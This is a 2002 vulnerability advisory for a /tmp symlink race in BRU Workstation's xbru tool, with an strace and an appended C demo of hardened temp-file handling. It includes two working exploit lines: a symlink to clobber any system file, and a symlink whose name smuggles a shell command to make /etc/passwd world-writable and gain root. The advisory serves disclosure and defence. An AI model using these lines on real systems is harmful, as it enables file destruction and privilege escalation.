Backup / Restore Utility [BRU]
------------------------------
advisory@prophecy.net.nz - 04/09/02

About:
- http://www.tolisgroup.com/
- "BRU Workstation 17.0 Backup & Restore Utility is a functionally-rich backup solution designed for commercial networked systems when the client/server capability of BRU-Pro is more than you need. Available to support a multitude of platforms, BRU Workstation protects data via NFS, AFS, SMB, and NetAtalk mounted filesystems."

Problem:
- Race condition in the xbru component. When listing archive contents, xbru (running as root) copies the first tape block to the fixed, predictable path /tmp/xbru_dscheck.dd, creating it with O_CREAT|O_TRUNC and no O_EXCL (see the strace snippet below). A symlink planted at that name beforehand is followed, so the link target is created or truncated with root's privileges.

Versions Tested:
- 17.0 (Workstation Edition)

Exploit:
- Testing confirmed that this vulnerability can be used to clobber any system file:
  ln -s /file/to/clobber /tmp/xbru_dscheck.dd
- Testing confirmed that this vulnerability can be used to obtain root via spybreak's logwatch method (and possibly others):
  ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd

Notes:
- Wait for root to navigate through xbru to 'list archive contents'. (A tape must be present in the tape drive for this to work.)

Fix:
- No response from vendor (support@tolisgroup.com).

Note: This is a new discovery, not the same as
http://online.securityfocus.com/bid/3970
but it is contained within the same product. Unfortunately it seems that a fix was never released for that previous race condition either.
Strace Snippet:

[pid 32159] execve("/bin/dd", ["dd", "if=/dev/nst0", "of=/tmp/xbru_dscheck.dd", "bs=32k", "count=1"], [/* 38 vars */]) = 0
[pid 32159] open("/tmp/xbru_dscheck.dd", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 1
<snip>
[pid 32151] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
<snip>
[pid 32161] execve("/bin/dd", ["dd", "if=/tmp/xbru_dscheck.dd", "count=1", "bs=216"], [/* 38 vars */]) = 0
[pid 32161] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 0
<snip>
[pid 32162] execve("/bin/bru", ["bru", "-gB", "-b4k", "-f", "/tmp/xbru_dscheck.dd"], [/* 38 vars */]) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32163] execve("/usr/local/xbru/mounttape.tcl", ["/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0
[pid 32163] execve("/usr/bin/wish", ["/usr/bin/wish", "/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", F_OK) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
[pid 32162] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 3
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32167] execve("/usr/local/xbru/unmounttape.tcl", ["/usr/local/xbru/unmounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "4"], [/* 39 vars */]) = 0
[pid 32151] lstat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
[pid 32151] unlink("/tmp/xbru_dscheck.dd") = 0
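The root cause visible in the strace is the open(O_WRONLY|O_CREAT|O_TRUNC) of a fixed /tmp name with no O_EXCL. The C program below is an added example (not code from the advisory or from BRU) that reproduces that open beside the hardened variant and the mkstemp() approach a fixed xbru should use; it runs entirely inside a private directory it creates itself, with a constructed "victim" file standing in for the clobbered system file. All function names and the /tmp/bru_demo.XXXXXX directory template are this example's own assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern from the strace: fixed name in world-writable /tmp, opened
 * O_CREAT|O_TRUNC with no O_EXCL, so a pre-planted symlink is followed and its
 * target truncated with the caller's (root's) privileges. */
int open_scratch_unsafe(const char *fixed_path) {
    return open(fixed_path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened open of the same path: O_EXCL fails with EEXIST if anything already
 * exists there (dangling symlinks included) and O_NOFOLLOW refuses symlinks. */
int open_scratch_safe(const char *fixed_path) {
    return open(fixed_path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario inside `dir`: a victim file plus a symlink planted under
 * xbru's scratch name. Bitmask result: 1 = unsafe open truncated the victim,
 * 2 = hardened open refused the link, 4 = mkstemp() gave a private regular file
 * (the preferred fix: random name, O_CREAT|O_EXCL, mode 0600). */
int demo_symlink_race(const char *dir) {
    char victim[PATH_MAX], link[PATH_MAX], tmpl[PATH_MAX];
    struct stat st; int fd, result = 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/xbru_dscheck.dd", dir);
    snprintf(tmpl, sizeof tmpl, "%s/xbru_dscheck.XXXXXX", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0 || write(fd, "important", 9) != 9) return -1;
    close(fd); if (symlink(victim, link) != 0) return -1;
    fd = open_scratch_unsafe(link);                /* follows the planted link */
    if (fd >= 0) { if (stat(victim, &st) == 0 && st.st_size == 0) result |= 1; close(fd); }
    fd = open_scratch_safe(link);                  /* refuses the planted link */
    if (fd < 0 && (errno == EEXIST || errno == ELOOP)) result |= 2; else if (fd >= 0) close(fd);
    fd = mkstemp(tmpl);                            /* private, unpredictable scratch file */
    if (fd >= 0) { if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode)) result |= 4; close(fd); unlink(tmpl); }
    unlink(link); unlink(victim);
    return result;
}

/* Runs the scenario in a fresh private directory; a correct run returns 7. */
int run_demo_in_tmpdir(void) {
    char dir[] = "/tmp/bru_demo.XXXXXX";
    int result = mkdtemp(dir) ? demo_symlink_race(dir) : -1;
    rmdir(dir);
    return result;
}
```

The same checks apply to the later stat64()/open() pairs in the trace: checking a path and then opening it by name leaves a window in which the name can be swapped, so a fixed xbru should keep using the descriptor returned by the exclusive create rather than reopening /tmp/xbru_dscheck.dd by name.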